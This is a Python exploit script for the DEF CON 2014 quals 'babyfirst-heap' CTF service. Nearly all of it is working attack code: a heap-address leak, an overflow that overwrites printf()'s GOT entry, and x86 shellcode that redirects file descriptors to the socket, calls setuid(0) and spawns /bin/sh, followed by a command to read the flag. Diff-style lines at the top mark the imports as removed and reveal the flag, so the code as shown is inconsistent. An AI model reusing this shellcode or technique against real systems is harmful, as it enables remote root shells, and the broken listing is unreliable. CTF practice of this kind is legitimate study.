- import socket
- import random,re,struct
- from time import sleep
- # tasteless - Razor4x
- #The flag is: Good job on that doubly linked list. Why don't you try something harder!!OMG!!
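# Remote exploit for the DEF CON 2014 quals "babyfirst-heap" service
# (a heap overflow that ends in a GOT overwrite of printf()).
#
# The script was written for Python 2; every protocol string below is a
# bytes literal so it also runs unchanged on Python 3.  All offsets and the
# shellcode are specific to the 2014 challenge binary (32-bit x86) and will
# not transfer to another build.  The host below is a long-dead CTF target.

HOST = "babyfirst-heap_33ecf0ad56efc1b322088f95dd98827c.2014.shallweplayaga.me"
PORT = 4088

# Little-endian address of printf()'s GOT slot in the challenge binary
# (0x0804bffc).  The overflow writes our payload address into this slot so
# the next printf() call lands in the shellcode.
PRINTF_GOT = b"\xfc\xbf\x04\x08"

# Distance from the heap address the service leaks ("loc=0x...") to the
# chunk that will hold our payload.  In the author's run the leaked chunk
# was presumably 0x0804d008 and the payload chunk 0x0804f360 -- confirm
# against the service's allocation listing before reuse.
PAYLOAD_OFFSET = 0x0804f360 - 0x0804D008  # +0x2358

# Chunk listing line that carries the leak we key on.  Why this particular
# allocation is the reliable one is not recorded; it is the original
# author's heuristic (presumably an allocation id in the listing).
LEAK_MARKER = b"1246"

# Text the service prints when it is ready for the overflowing write.
WRITE_PROMPT = b"Write"

# Marker seen once the shell is up and has echoed something back; the
# original author keys the flag read on it.  Its exact origin is not
# documented -- TODO confirm if the service changes.
SHELL_MARKER = b"058"

# x86-32 Linux shellcode.  Decoded from the bytes:
#   dup2(4, 2); dup2(4, 1); dup2(4, 0)   -- assumes the client socket is fd 4
SC_DUP2 = (
    b"\x31\xc0\x31\xdb\x31\xc9\xb3\x04\xb1\x03\xb0\x3f\xfe\xc9\xcd\x80"
    b"\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80"
    b"\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80"
)
#   setuid(0)
SC_SETUID = b"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
#   execve("/bin/sh", ["/bin/sh"], NULL) via the classic jmp/call trick
SC_EXECVE = (
    b"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    b"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    b"\x80\xe8\xdc\xff\xff\xff/bin/sh"
)
SHELLCODE = SC_DUP2 + SC_SETUID + SC_EXECVE

# Padding sizes inherited from the original exploit; they fit the payload
# to the target chunk's layout and were found empirically -- TODO confirm.
PAD_BEFORE_SHELLCODE = 16
PAD_AFTER_SHELLCODE = 151

FLAG_COMMAND = b"cat /home/babyfirst-heap/flag\n"


def parse_leak(chunk):
    """Return the heap address leaked in *chunk* as an int.

    The service prints lines of the form ``... loc=0x0804d008]``; the first
    such occurrence in *chunk* is parsed as a hexadecimal integer.

    Raises:
        ValueError: if *chunk* contains no ``loc=...]`` leak (the original
            script deferred this to an AttributeError on ``None.group``).
    """
    match = re.search(br"loc=(.+?)\]", chunk)
    if match is None:
        raise ValueError("no 'loc=...]' heap leak found in service output")
    return int(match.group(1), 16)


def payload_address(leaked_base):
    """Return the address the shellcode will live at, given the leaked base."""
    return leaked_base + PAYLOAD_OFFSET


def build_payload(leaked_base):
    """Assemble the overflowing write for a run whose leak was *leaked_base*.

    Layout: printf GOT slot, then the (little-endian) address of our
    payload to store in it, padding, shellcode, padding, newline.

    Raises:
        struct.error: if the computed payload address does not fit 32 bits.
    """
    target = struct.pack("<I", payload_address(leaked_base))
    return b"".join([
        PRINTF_GOT,
        target,
        b"C" * PAD_BEFORE_SHELLCODE,
        SHELLCODE,
        b"C" * PAD_AFTER_SHELLCODE,
        b"\n",
    ])


def _recv_or_fail(sock):
    """recv() one chunk; raise EOFError instead of looping on a closed peer."""
    data = sock.recv(4096)
    if not data:
        raise EOFError("service closed the connection")
    return data


def main():
    """Connect, read the leak, overwrite printf()'s GOT slot, then read the flag."""
    sock = socket.socket()
    sock.connect((HOST, PORT))
    try:
        leaked_base = None
        # Phase 1: read the allocation listing until the write prompt,
        # picking the leak out of the chunk that carries LEAK_MARKER.
        while True:
            data = _recv_or_fail(sock)
            print(data)
            if LEAK_MARKER in data:
                leaked_base = parse_leak(data)
            if WRITE_PROMPT in data:
                break
        if leaked_base is None:
            raise RuntimeError("write prompt reached without seeing the heap leak")

        target = payload_address(leaked_base)
        print(hex(PAYLOAD_OFFSET))
        print(hex(target))

        # Phase 2: deliver the overflow.  sendall() -- send() may be partial.
        sock.sendall(build_payload(leaked_base))

        # Phase 3: once the shell answers, ask for the flag exactly once and
        # echo everything until the peer closes (the original looped forever
        # and re-sent the command on every chunk containing the marker).
        asked_for_flag = False
        while True:
            data = sock.recv(4096)
            if not data:
                break
            print(data)
            if not asked_for_flag and SHELL_MARKER in data:
                sock.sendall(FLAG_COMMAND)
                asked_for_flag = True
    finally:
        sock.close()


if __name__ == "__main__":
    main()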